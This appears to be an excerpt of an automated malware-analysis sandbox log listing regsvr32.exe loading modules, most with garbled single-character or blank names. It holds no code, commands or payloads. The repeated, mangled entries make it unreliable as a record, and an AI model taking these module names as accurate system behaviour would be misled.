Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll	Jump to behavior
